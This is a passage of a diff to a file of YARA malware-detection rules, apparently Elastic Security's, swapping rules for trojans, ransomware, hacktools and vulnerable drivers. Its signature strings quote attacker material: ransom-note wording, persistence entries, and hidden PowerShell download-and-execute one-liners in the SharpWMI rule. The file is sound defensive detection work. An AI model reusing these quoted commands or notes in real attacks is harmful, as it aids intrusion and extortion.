MEMORY" - fingerprint = "8f095e7909860471e2702b247f4cefa694b698c236e67844ef0b0b7714518a18" + fingerprint = "3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455" + threat_name = "Windows.Trojan.Gh0st" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81416,93 +81951,102 @@ rule ELASTIC_Windows_Trojan_Latrodectus_841Ff697 : FILE MEMORY os = "windows" strings: - $Str1 = { 48 83 EC 38 C6 44 24 20 73 C6 44 24 21 63 C6 44 24 22 75 C6 44 24 23 62 C6 44 24 24 } - $crc32_loadlibrary = { 48 89 44 24 40 EB 02 EB 90 48 8B 4C 24 20 E8 ?? ?? FF FF 48 8B 44 24 40 48 81 C4 E8 02 00 00 C3 } - $delete_self = { 44 24 68 BA 03 00 00 00 48 8B 4C 24 48 FF 15 ED D1 00 00 85 C0 75 14 48 8B 4C 24 50 E8 ?? ?? 00 00 B8 FF FF FF FF E9 A6 00 } - $Str4 = { 89 44 24 44 EB 1F C7 44 24 20 00 00 00 00 45 33 C9 45 33 C0 33 D2 48 8B 4C 24 48 FF 15 7E BB 00 00 89 44 24 44 83 7C 24 44 00 75 02 EB 11 48 8B 44 24 48 EB 0C 33 C0 85 C0 0F 85 10 FE FF FF 33 } - $handler_check = { 83 BC 24 D8 01 00 00 12 74 36 83 BC 24 D8 01 00 00 0E 74 2C 83 BC 24 D8 01 00 00 0C 74 22 83 BC 24 D8 01 00 00 0D 74 18 83 BC 24 D8 01 00 00 0F 74 0E 83 BC 24 D8 01 00 00 04 0F 85 44 02 00 00 } - $hwid_calc = { 48 89 4C 24 08 48 8B 44 24 08 69 00 0D 66 19 00 48 8B 4C 24 08 89 01 48 8B 44 24 08 8B 00 C3 } - $string_decrypt = { 89 44 24 ?? 48 8B 44 24 ?? 0F B7 40 ?? 8B 4C 24 ?? 33 C8 8B C1 66 89 44 24 ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 89 44 24 ?? 33 C0 66 89 44 24 ?? EB ?? } - $campaign_fnv = { 48 03 C8 48 8B C1 48 39 44 24 08 73 1E 48 8B 44 24 08 0F BE 00 8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01 89 04 24 EB BE } + $a1 = ":]%d-%d-%d %d:%d:%d" ascii fullword + $a2 = "[Pause Break]" ascii fullword + $a3 = "f-secure.exe" ascii fullword + $a4 = "Accept-Language: zh-cn" ascii fullword condition: - 2 of them + all of them } -rule ELASTIC_Linux_Hacktool_Aduh_6Cae7C78 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Asio_5F9F29Be : FILE { meta: - description = "Detects Linux Hacktool Aduh (Linux.Hacktool.Aduh)" + description = "Detects Windows Vulndriver Asio (Windows.VulnDriver.AsIo)" author = "Elastic Security" - id = "6cae7c78-a4b4-4096-9f7c-746b1e5a1e38" - date = "2021-04-06" - modified = "2021-09-16" + id = "5f9f29be-9dbb-4d0f-84f5-7027c1413c2c" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Hacktool_Aduh.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9c67207546ad274dc78a0819444d1c8805537f9ac36d3c53eba9278ed44b360c" - logic_hash = "130df108de5b6cdfb9227f96301bdaa1e272d47b8cb9ad96c3aa574bf65870b2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_AsIo.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15" + logic_hash = "a901d81737c7e6d00e87f0eec758dd063eade59d9883e85e04a33bb18f2f99de" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "8d7b0c1a95ec15c7d1ede5670ccd448b166467ed8eb2b4f38ebbb2c8bc323cdc" - severity = 100 + tags = "FILE" + fingerprint = "82967badefb37a3964de583cb65f423afe46abc299d361c7a9cd407b146fd897" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E3 51 89 E2 51 89 E1 B0 0B CD 80 31 C0 B0 01 CD } + $str1 = "\\AsIO.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Hiddad_E35Bff7B : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Hellokitty_8859E8E8 : FILE MEMORY { meta: - description = "Detects Linux Trojan Hiddad (Linux.Trojan.Hiddad)" + description = "Detects Windows Ransomware Hellokitty (Windows.Ransomware.Hellokitty)" author = "Elastic Security" - id = "e35bff7b-1a93-4cfd-a4b6-1e994c0afa98" - date = "2021-01-12" - modified = "2021-09-16" + id = "8859e8e8-f94c-4853-b296-1fc801486c57" + date = "2021-05-03" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Hiddad.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "22a418e660b5a7a2e0cc1c1f3fe1d150831d75c4fedeed9817a221194522efcf" - logic_hash = "3881222807585dc933cb61473751d13297fa7eb085a50d435d3b680354a35ee9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Hellokitty.yar#L1-L32" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9" + logic_hash = "72cc718724d9d9a391a9f7a0932ebf397c2ab79558437533bef6e380b06baff9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0ed46ca8a8bd567acf59d8a15a9597d7087975e608f42af57d36c31e777bb816" + fingerprint = "f9791409d2a058dd68dc09df5e4b597c6c6a1f0da9801d7ab9e678577b621730" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 3C 14 48 63 CF 89 FE 48 69 C9 81 80 80 80 C1 FE 1F 48 C1 E9 20 } + $a1 = "HelloKittyMutex" wide fullword + $a2 = "%s\\read_me_lkd.txt" wide fullword + $a3 = "Win32_ShadowCopy.ID='%s'" wide fullword + $a4 = "Trying to decrypt or modify the files with programs other than our decryptor can lead to permanent loss of data!" wide fullword + $a5 = "%s/secret/%S" wide fullword + $a6 = "DECRYPT_NOTE.txt" wide fullword + $a7 = "Some data has been stored in our servers and ready for publish." wide fullword + $a9 = "To contact with us you have ONE week from the encryption time, after decryption keys and your personal contact link will be dele" wide + $a10 = "In case of your disregard, we reserve the right to dispose of the dumped data at our discretion including publishing." wide fullword + $a11 = "IMPORTANT: Don't modify encrypted files or you can damage them and decryption will be impossible!" wide fullword + $b1 = "/f /im \"%s\"" wide fullword + $b2 = "stop \"%s\"" wide fullword + $b3 = "/f /im %s" wide fullword + $b4 = "stop %s" wide fullword condition: - all of them + (2 of ($a*) and 2 of ($b*)) or (5 of ($a*)) } -rule ELASTIC_Windows_Trojan_Ghostengine_8Ea2Aa65 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Hellokitty_4B668121 : FILE MEMORY { meta: - description = "Detects Windows Trojan Ghostengine (Windows.Trojan.GhostEngine)" + description = "Detects Windows Ransomware Hellokitty (Windows.Ransomware.Hellokitty)" author = "Elastic Security" - id = "8ea2aa65-d7e2-4c58-9f95-3194cd8b6990" - date = "2024-05-07" - modified = "2024-05-13" + id = "4b668121-cc21-4f0b-b0fc-c2b5b4cb53e8" + date = "2021-05-03" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_GhostEngine.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753" - logic_hash = "3bddd2ac79d92d34df5d2df4a11cf96cc44ca39c3baece1b5c67b75a682778ff" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Hellokitty.yar#L34-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0" + logic_hash = "00c7a492c304f12b9909e35cf069618a1103311a69e3e8951ca196c3c663b12a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "17c4c2fa2d412b79ee197de1e6bd6a4c882ad894be54a780e540627a570756e5" + fingerprint = "834316ce0f3225b1654b3c4bccb673c9ad815e422276f61e929d5440ca51a9fa" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81510,35 +82054,35 @@ rule ELASTIC_Windows_Trojan_Ghostengine_8Ea2Aa65 : FILE MEMORY os = "windows" strings: - $str0 = "\\\\.\\IOBitUnlockerDevice" - $str1 = "C:\\Windows\\Fonts\\taskhostw.exe" - $str2 = "C:\\Windows\\Fonts\\config.json" - $str3 = "/drives/kill.png" - $str4 = "C:\\Windows\\Fonts\\WinRing0x64.sys" - $str5 = "C:\\Windows\\Fonts\\smartsscreen.exe" - $binary0 = { 89 C2 C1 E8 1F C1 E0 1F 85 C0 0F 84 74 01 00 00 D1 E2 89 CB C1 E9 1F 09 D1 D1 E3 C1 EB 1F 89 CA D1 E1 09 D9 89 CB 81 C1 80 7F B1 D7 C1 EA 1F 81 C3 80 7F B1 D7 83 D2 0D 81 C1 00 09 6E 88 89 4C 24 20 83 D2 F1 89 54 24 24 } - $binary1 = { 83 F9 06 0F ?? ?? ?? ?? ?? 8B 10 81 FA 78 38 36 5F 0F 85 ?? ?? ?? ?? 0F B7 50 04 66 81 FA 36 34 74 ?? E9 ?? ?? 00 00 C7 04 24 00 E4 0B 54 C7 44 24 04 02 00 00 00 } + $a1 = "(%d) [%d] %s: STOP DOUBLE PROCESS RUN" ascii fullword + $a2 = "(%d) [%d] %s: Looking for folder from cmd: %S" ascii fullword + $a3 = "(%d) [%d] %s: ERROR: Failed to encrypt AES block" ascii fullword + $a4 = "gHelloKittyMutex" wide fullword + $a5 = "/C ping 127.0.0.1 & del %s" wide fullword + $a6 = "Trying to decrypt or modify the files with programs other than our decryptor can lead to permanent loss of data!" + $a7 = "read_me_lkdtt.txt" wide fullword + $a8 = "If you want to get it, you must pay us some money and we will help you." wide fullword condition: - 3 of ($str*) or 1 of ($binary*) + 5 of them } -rule ELASTIC_Windows_Trojan_Nanocore_D8C4E3C5 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Hellokitty_D9391A1A : FILE MEMORY { meta: - description = "Detects Windows Trojan Nanocore (Windows.Trojan.Nanocore)" + description = "Detects Windows Ransomware Hellokitty (Windows.Ransomware.Hellokitty)" author = "Elastic Security" - id = "d8c4e3c5-8bcc-43d2-9104-fa3774282da5" - date = "2021-06-13" - modified = "2021-08-23" + id = "d9391a1a-78d3-4ae6-8e45-630ceec8bade" + date = "2021-05-03" + modified = "2023-01-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Nanocore.yar#L1-L29" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd" - logic_hash = "fcc13e834cd8a1f86b453fe3c0333cd358e129d6838a339a824f1a095d85552d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Hellokitty.yar#L61-L80" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768" + logic_hash = "074ca47c0526d9828f3c07c7d6dbdd1cec609670d70340b022ae2c712ad80305" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4" + fingerprint = "8779a926a237af0a966534931b60acd54f5d6d65063c070a3621ec604e280ff8" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81546,38 +82090,29 @@ rule ELASTIC_Windows_Trojan_Nanocore_D8C4E3C5 : FILE MEMORY os = "windows" strings: - $a1 = "NanoCore.ClientPluginHost" ascii fullword - $a2 = "NanoCore.ClientPlugin" ascii fullword - $b1 = "get_BuilderSettings" ascii fullword - $b2 = "ClientLoaderForm.resources" ascii fullword - $b3 = "PluginCommand" ascii fullword - $b4 = "IClientAppHost" ascii fullword - $b5 = "GetBlockHash" ascii fullword - $b6 = "AddHostEntry" ascii fullword - $b7 = "LogClientException" ascii fullword - $b8 = "PipeExists" ascii fullword - $b9 = "IClientLoggingHost" ascii fullword + $a1 = { 83 C4 04 85 DB 75 12 0F 10 45 D4 83 C7 10 0F 11 06 83 C6 10 83 } + $a2 = { 89 45 F8 3B 5D F4 75 25 3B C6 75 21 6A FF FF 75 14 8B D1 83 } condition: - 1 of ($a*) or 6 of ($b*) + any of them } -rule ELASTIC_Linux_Trojan_Truncpx_894D60F8 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Morpes_D2Ae1Edf : FILE MEMORY { meta: - description = "Detects Linux Trojan Truncpx (Linux.Trojan.Truncpx)" + description = "Detects Linux Trojan Morpes (Linux.Trojan.Morpes)" author = "Elastic Security" - id = "894d60f8-bea6-4b09-b8ab-526308575a01" - date = "2021-04-06" + id = "d2ae1edf-7dd3-4506-96e0-039c8f00d688" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Truncpx.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2f09f2884fd5d3f5193bfc392656005bce6b935c12b3049ac8eb96862e4645ba" - logic_hash = "9bc0a7fbddac532b53c72681f349bca0370b1fe6fb2d16f539560085b3ec4be3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Morpes.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "14c4c297388afe4be47be091146aea6c6230880e9ea43759ef29fc1471c4b86b" + logic_hash = "27eb8b4d0f91477c2ac26a5e25bfc52903faf5501300ec40773d3fc6797c3218" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "440ce5902642aeef56b6989df4462d01faadc479f1362c0ed90d1011e8737bc3" + fingerprint = "a4cedb0ef6c9c5121ee63c0c8f6bb8072f62b5866c916c7000d94999cd61b9b5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81585,158 +82120,123 @@ rule ELASTIC_Linux_Trojan_Truncpx_894D60F8 : FILE MEMORY os = "linux" strings: - $a = { B9 51 FE 88 63 A1 08 08 09 C5 1A FF D3 AB B2 28 } + $a = { 64 B0 05 00 00 B0 05 00 00 B0 05 00 00 3C 00 00 00 3C 00 00 00 } condition: all of them } -rule ELASTIC_Multi_Ransomware_Luna_8614D3D7 : FILE MEMORY +rule ELASTIC_Macos_Infostealer_Encodedosascript_Eeb54A7E : FILE MEMORY { meta: - description = "Detects Multi Ransomware Luna (Multi.Ransomware.Luna)" + description = "Detects Macos Infostealer Encodedosascript (Macos.Infostealer.EncodedOsascript)" author = "Elastic Security" - id = "8614d3d7-7fd2-4cf9-aa97-48a8d9333f38" - date = "2022-08-02" - modified = "2022-08-16" - reference = "https://www.elastic.co/security-labs/luna-ransomware-attack-pattern" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Ransomware_Luna.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51" - logic_hash = "14e40c5b1a21ba31664ed31b04bfc4a8646b3e31f96d39e0928a3d6a50d79307" + id = "eeb54a7e-ebb3-4bf9-8538-2dbad9e514b9" + date = "2024-08-19" + modified = "2024-08-26" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Macos_Infostealer_EncodedOsascript.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05" + logic_hash = "2f450c9afd92f52cdd8333e39e41b7334a01ddc39371c118260820a878359742" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "90c97ecfce451e1373af0d7538cf12991cc844d05c99ee18570e176143ccd899" + fingerprint = "7b9d3cc64f3cfbdf1f9938ab923ff06eb6aef78fce633af891f5dd6a6b38dd2d" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "macos" strings: - $str_extensions = ".ini.exe.dll.lnk" - $str_ransomnote_bs64 = "W1dIQVQgSEFQUEVORUQ/XQ0KDQpBbGwgeW91ciBmaWxlcyB3ZXJlIG1vdmVkIHRvIHNlY3VyZSBzdG9yYWdlLg0KTm9ib" - $str_path = "/home/username/" - $str_error1 = "Error while writing encrypted data to:" - $str_error2 = "Error while writing public key to:" - $str_error3 = "Error while renaming file:" - $chunk_calculation0 = { 48 8D ?? 00 00 48 F4 48 B9 8B 3D 10 B6 9A 5A B4 36 48 F7 E1 48 } - $chunk_calculation1 = { 48 C1 EA 12 48 89 D0 48 C1 E0 05 48 29 D0 48 29 D0 48 3D C4 EA 00 00 } + $xor_encoded_osascript = "osascript" xor(0x40) + $base32_encoded_osascript = { 4E 35 5A 57 43 34 33 44 4F 4A 55 58 41 35 } + $hex_encoded_osascript = "6f7361736372697074" ascii wide nocase condition: - 5 of ($str_*) or all of ($chunk_*) + any of them } -rule ELASTIC_Linux_Trojan_Springtail_35D5B90B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Privateloader_96Ac2734 : FILE MEMORY { meta: - description = "Detects Linux Trojan Springtail (Linux.Trojan.Springtail)" + description = "Detects Windows Trojan Privateloader (Windows.Trojan.PrivateLoader)" author = "Elastic Security" - id = "35d5b90b-f81d-4a10-828b-8315f8e87ca7" - date = "2024-05-18" - modified = "2024-06-12" + id = "96ac2734-e36c-4ce2-bb40-b6bd77694333" + date = "2023-01-03" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Springtail.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "30584f13c0a9d0c86562c803de350432d5a0607a06b24481ad4d92cdf7288213" - logic_hash = "7158e60aedfde884d9ee01457abfe6d9b6b1df9cdc1c415231d98429866eaa6c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_PrivateLoader.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "077225467638a420cf29fb9b3f0241416dcb9ed5d4ba32fdcf2bf28f095740bb" + logic_hash = "9f96f1c54853866e124d0996504e6efd3d154111390617999cc10520d7f68fe6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ca2d3ea7b23c0fc21afb9cfd2d6561727780bda65d2db1a5780b627ac7b07e66" + fingerprint = "029056908abef6c3ceecf7956e64a6d25b67c391f699516b3202d2aa3733f15a" severity = 100 - arch_context = "x86, arm64" + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $systemd1 = "Description=syslogd" - $systemd2 = "ExecStart=/bin/sh -c \"/var/log/syslogd\"" - $cron1 = "cron.txt@reboot" - $cron2 = "/bin/shcrontab" - $cron3 = "type/var/log/syslogdcrontab cron.txt" - $uri = "/mir/index.php" + $xor_decrypt = { 0F 28 85 ?? ?? FF FF 66 0F EF ?? ?? FE FF FF 0F 29 85 ?? ?? FF FF 0F 28 85 ?? ?? FF FF } + $str0 = "https://ipinfo.io/" wide + $str1 = "Content-Type: application/x-www-form-urlencoded" wide + $str2 = "https://db-ip.com/" wide condition: - all of them + all of ($str*) and #xor_decrypt>3 } -rule ELASTIC_Linux_Exploit_CVE_2009_2908_406C2Fef : FILE MEMORY CVE_2009_2908 +rule ELASTIC_Windows_Trojan_Revengerat_Db91Bcc6 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2009 2908 (Linux.Exploit.CVE-2009-2908)" + description = "Detects Windows Trojan Revengerat (Windows.Trojan.Revengerat)" author = "Elastic Security" - id = "406c2fef-0f1a-441a-96b9-e4168c283c90" - date = "2021-01-12" - modified = "2021-09-16" + id = "db91bcc6-024d-42da-8d0a-bd69374bf622" + date = "2021-09-02" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2009_2908.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1e05a23f5b3b9cfde183aec26b723147e1816b95dc0fb7f9ac57376efcb22fcd" - logic_hash = "ae379ca7564eb97f141f6ad71ca12973bf1a38cda4bc03e3f4dca1939a9b6b38" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Revengerat.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd" + logic_hash = "1e33cb1d614aae0b2181ebaca694c69e7fc849b3a3b7ffff7059e8c43553f8cc" score = 75 - quality = 75 - tags = "FILE, MEMORY, CVE-2009-2908" - fingerprint = "94a94217823a8d682ba27889ba2b53fef7b18ae14d75a73456f21184e51581cf" + quality = 50 + tags = "FILE, MEMORY" + fingerprint = "9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 74 00 66 70 72 69 6E 74 66 00 66 77 72 69 74 65 00 64 65 73 } + $a1 = "Revenge-RAT" wide fullword + $a2 = "SELECT * FROM FirewallProduct" wide fullword + $a3 = "HKEY_CURRENT_USER\\SOFTWARE\\" wide fullword + $a4 = "get_MachineName" ascii fullword condition: all of them } -rule ELASTIC_Windows_Vulndriver_Powerprofiler_2Eedff78 : FILE +rule ELASTIC_Windows_Ransomware_Wannacry_D9855102 : FILE MEMORY { meta: - description = "Name: AMDPowerProfiler.sys, Version: 6.1.0.0" + description = "Detects Windows Ransomware Wannacry (Windows.Ransomware.WannaCry)" author = "Elastic Security" - id = "2eedff78-aa9b-4dab-b5f4-187bd2fc9a0c" - date = "2022-04-07" - modified = "2022-04-07" + id = "d9855102-56dc-4e4c-9599-82fa52922b95" + date = "2022-08-29" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_PowerProfiler.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05" - logic_hash = "c4a7ae2ffdf70984cea5b543af93b202c78b6108da1e442186d24071b44d6259" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_WannaCry.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0b7878babbaf7c63d808f3ce32c7306cb785fdfb1ceb73be07fb48fdd091fdfb" + logic_hash = "5edf6a42c9f20de3819b46f24be243940b79e7e9004fee3d601794ea0b534cf1" score = 75 quality = 75 - tags = "FILE" - fingerprint = "1273f1cd2de84076be28d7fb5fdac5fc9ab0de6f4e18915bdce6333181983cfb" - threat_name = "Windows.VulnDriver.PowerProfiler" - severity = 50 - arch_context = "x86" - scan_context = "file" - license = "Elastic License v2" - os = "windows" - - strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 41 00 4D 00 44 00 50 00 6F 00 77 00 65 00 72 00 50 00 72 00 6F 00 66 00 69 00 6C 00 65 00 72 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x05][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ - - condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version -} -rule ELASTIC_Windows_Hacktool_Sharpwmi_A67D6Fe5 : FILE MEMORY -{ - meta: - description = "Detects Windows Hacktool Sharpwmi (Windows.Hacktool.SharpWMI)" - author = "Elastic Security" - id = "a67d6fe5-3ce5-4e63-979e-3fb799d9d173" - date = "2022-10-20" - modified = "2022-11-24" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpWMI.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2134a5e1a5eece1336f831a7686c5ea3b6ca5aaa63ab7e7820be937da0678e15" - logic_hash = "de8749951ece8d4798ade4661d531515e12edf8e8606ddc330000d847a66a26c" - score = 75 - quality = 73 tags = "FILE, MEMORY" - fingerprint = "20719ea15d4dee90c95b474689752172a6b6fb941dced81803f9f726ddc26d29" + fingerprint = "f96f2f0eb3cdf6e882adcad06ad10e375412dec99687b3d38d4dbe9bdde52db5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -81744,35 +82244,35 @@ rule ELASTIC_Windows_Hacktool_Sharpwmi_A67D6Fe5 : FILE MEMORY os = "windows" strings: - $guid = "6DD22880-DAC5-4B4D-9C91-8C35CC7B8180" ascii wide nocase - $str0 = "powershell -w hidden -nop -c \"$e=([WmiClass]'{0}:{1}').Properties['{2}'].Value;[IO.File]::WriteAllBytes('{3}',[Byte[]][Int[]]($e-split','))\"" ascii wide - $str1 = "powershell -w hidden -nop -c \"iex($env:{0})\"" ascii wide - $str2 = "SELECT * FROM Win32_Process" ascii wide - $str3 = "DOWNLOAD_URL" ascii wide - $str4 = "TARGET_FILE" ascii wide - $str5 = "SELECT Enabled,DisplayName,Action,Direction,InstanceID from MSFT_NetFirewallRule WHERE Enabled=1" ascii wide - $print_str0 = "This may indicate called SharpWMI did not invoked WMI using elevated/impersonated token." ascii wide - $print_str1 = "[+] Attempted to terminate remote process ({0}). Returned: {1}" ascii wide + $a1 = "@WanaDecryptor@.exe" wide fullword + $a2 = ".WNCRY" wide fullword + $a3 = "$%d worth of bitcoin" fullword + $a4 = "%d%d.bat" fullword + $a5 = "This folder protects against ransomware. Modifying it will reduce protection" wide fullword + $b1 = { 53 55 56 